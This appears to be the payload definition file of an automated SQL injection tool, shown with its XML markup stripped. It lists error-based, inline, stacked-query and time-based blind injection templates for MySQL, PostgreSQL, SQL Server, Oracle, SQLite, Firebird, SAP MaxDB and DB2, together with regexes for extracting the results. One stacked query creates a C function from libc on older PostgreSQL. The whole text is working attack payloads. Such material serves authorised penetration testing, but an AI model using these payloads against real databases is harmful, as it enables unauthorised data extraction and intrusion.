    - - - Microsoft SQL Server/Sybase error-based - Parameter replace (integer column) - 2 - 4 - 0 - 1,3 - 3 - (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') - - (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle error-based - Parameter replace - 2 - 3 - 0 - 1,3 - 3 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - Firebird error-based - Parameter replace - 2 - 4 - 0 - 1,3 - 3 - (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) - - (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Firebird -
    -
    - - - - - - MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses - 2 - 3 - 0 - 2,3 - 1 - ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE) - 2 - 3 - 0 - 2,3 - 1 - ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) - - ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML) - 2 - 4 - 0 - 2,3 - 1 - ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) - - ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL - >= 5.1 -
    -
    - - - PostgreSQL error-based - GROUP BY and ORDER BY clauses - 2 - 3 - 0 - 2,3 - 1 - ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) - - ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase error-based - ORDER BY clause - 2 - 3 - 0 - 3 - 1 - ,(CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) - - ,(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle error-based - GROUP BY and ORDER BY clauses - 2 - 3 - 0 - 2,3 - 1 - ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - - - - - MySQL inline queries - 6 - 1 - 1 - 1,2,3,8 - 3 - (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) - - (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - MySQL -
    -
    - - - PostgreSQL inline queries - 6 - 1 - 1 - 1,2,3,8 - 3 - (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]') - - (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase inline queries - 6 - 1 - 1 - 1,2,3,8 - 3 - (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') - - (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle inline queries - 6 - 1 - 1 - 1,2,3,8 - 3 - (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL) - - (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Oracle -
    -
    - - - SQLite inline queries - 6 - 1 - 1 - 1,2,3,8 - 3 - SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' - - SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]' - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - SQLite -
    -
    - - Firebird inline queries - 6 - 2 - 1 - 1,2,3,8 - 3 - SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE - - SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
    - Firebird -
    -
    - - - - - - MySQL > 5.0.11 stacked queries - 4 - 1 - 0 - 0 - 1 - ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - ; SELECT SLEEP([SLEEPTIME]) - -- - - - - -
    - MySQL - > 5.0.11 -
    -
    - - - MySQL < 5.0.12 stacked queries (heavy query) - 4 - 2 - 2 - 0 - 1 - ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - -- - - - - -
    - MySQL -
    -
    - - - PostgreSQL > 8.1 stacked queries - 4 - 1 - 0 - 0 - 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - ; SELECT PG_SLEEP([SLEEPTIME]) - -- - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL stacked queries (heavy query) - 4 - 2 - 2 - 0 - 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) - -- - - - - -
    - PostgreSQL -
    -
    - - - PostgreSQL < 8.2 stacked queries (Glibc) - 4 - 4 - 0 - 0 - 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) - -- - - - - -
    - PostgreSQL - < 8.2 - Linux -
    -
    - - - Microsoft SQL Server/Sybase stacked queries - 4 - 1 - 0 - 0 - 1 - ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' - - ; WAITFOR DELAY '0:0:[SLEEPTIME]' - -- - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) - 4 - 5 - 0 - 0 - 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL - - ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL - -- - - - - -
    - Oracle -
    -
    - - - Oracle stacked queries (heavy query) - 4 - 5 - 2 - 0 - 1 - ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL - - ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 - -- - - - - -
    - Oracle -
    -
    - - - Oracle stacked queries (DBMS_LOCK.SLEEP) - 4 - 5 - 0 - 0 - 1 - ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END - - ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END - -- - - - - -
    - Oracle -
    -
    - - - Oracle stacked queries (USER_LOCK.SLEEP) - 4 - 5 - 0 - 0 - 1 - ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END - - ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END - -- - - - - -
    - Oracle -
    -
    - - - SQLite > 2.0 stacked queries (heavy query) - 4 - 3 - 2 - 0 - 1 - ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - - ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) - -- - - - - -
    - SQLite - > 2.0 -
    -
    - - - Firebird stacked queries (heavy query) - 4 - 3 - 2 - 0 - 1 - ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE - - ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 - -- - - - - -
    - Firebird - >= 2.0 -
    -
    - - - - - - - MySQL > 5.0.11 AND time-based blind - 5 - 1 - 1 - 1,2,3 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - - - - -
    - MySQL - > 5.0.11 -
    -
    - - - MySQL > 5.0.11 AND time-based blind (comment) - 5 - 4 - 1 - 1,2,3 - 1 - AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - AND SLEEP([SLEEPTIME]) - # - - - - -
    - MySQL - > 5.0.11 -
    -
    - - - MySQL < 5.0.12 AND time-based blind (heavy query) - 5 - 2 - 2 - 1,2,3 - 1 - AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - - - - -
    - MySQL -
    -
    - - - MySQL < 5.0.12 AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - # - - - - -
    - MySQL -
    -
    - - - PostgreSQL > 8.1 AND time-based blind - 5 - 1 - 1 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL > 8.1 AND time-based blind (comment) - 5 - 5 - 1 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - -- - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL AND time-based blind (heavy query) - 5 - 3 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - - - - -
    - PostgreSQL -
    -
    - - - PostgreSQL AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - -- - - - - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase time-based blind - 5 - 1 - 0 - 0 - 1 - IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' - - WAITFOR DELAY '0:0:[SLEEPTIME]' - -- - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase AND time-based blind (heavy query) - 5 - 2 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) - -- - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle AND time-based blind - 5 - 1 - 1 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) - - AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) - - - - -
    - Oracle -
    -
    - - - Oracle AND time-based blind (comment) - 5 - 5 - 1 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) - - AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) - -- - - - - -
    - Oracle -
    -
    - - - Oracle AND time-based blind (heavy query) - 5 - 2 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) - - - - -
    - Oracle -
    -
    - - - Oracle AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) - - AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) - -- - - - - -
    - Oracle -
    -
    - - - SQLite > 2.0 AND time-based blind (heavy query) - 5 - 3 - 2 - 1 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - - AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) - - - - -
    - SQLite - > 2.0 -
    -
    - - - SQLite > 2.0 AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1 - 1 - AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - - AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) - -- - - - - -
    - SQLite - > 2.0 -
    -
    - - - Firebird AND time-based blind (heavy query) - 5 - 4 - 2 - 1 - 1 - AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - - - - -
    - Firebird - >= 2.0 -
    -
    - - - Firebird AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1 - 1 - AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - -- - - - - -
    - Firebird - >= 2.0 -
    -
    - - - SAP MaxDB AND time-based blind (heavy query) - 5 - 3 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - - - - -
    - SAP MaxDB -
    -
    - - - SAP MaxDB AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - -- - - - - -
    - SAP MaxDB -
    -
    - - - IBM DB2 AND time-based blind (heavy query) - 5 - 3 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
    - IBM DB2 -
    -
    - - - IBM DB2 AND time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - -- - - - - -
    - IBM DB2 -
    -
    - - - - - - - MySQL > 5.0.11 OR time-based blind - 5 - 2 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR [RANDNUM]=SLEEP([SLEEPTIME]) - - - - -
    - MySQL - > 5.0.11 -
    -
    - - - MySQL < 5.0.12 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - - - - -
    - MySQL -
    -
    - - - PostgreSQL > 8.1 OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - - - - -
    - PostgreSQL - > 8.1 -
    -
    - - - PostgreSQL OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - - - - -
    - PostgreSQL -
    -
    - - - Microsoft SQL Server/Sybase OR time-based blind (heavy query) - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) - - - - -
    - Microsoft SQL Server - Sybase - Windows -
    -
    - - - Oracle OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) - - OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) - - - - -
    - Oracle -
    -
    - - - Oracle OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) - - - - -
    - Oracle -
    -
    - - - SQLite > 2.0 OR time-based blind (heavy query) - 5 - 4 - 3 - 1 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END) - - OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))) - - - - -
    - SQLite - > 2.0 -
    -
    - - - Firebird OR time-based blind (heavy query) - 5 - 5 - 3 - 1 - 2 - OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - - - - -
    - Firebird - >= 2.0 -
    -
    - - - SAP MaxDB OR time-based blind (heavy query - comment) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - - - - -
    - SAP MaxDB -
    -
    - - - IBM DB2 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
    - IBM DB2 -
    -
    - - - - - - - MySQL >= 5.0 time-based blind - Parameter replace - 5 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) - - - - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL < 5.0 time-based blind - Parameter replace (heavy queries) - 5 - 4 - 2 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) - - - - -
    - MySQL -
    -
    - - - MySQL time-based blind - Parameter replace (bool*int) - 5 - 4 - 1 - 1,2,3 - 3 - ([INFERENCE])*SLEEP([SLEEPTIME]) - - ([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME]) - - - - -
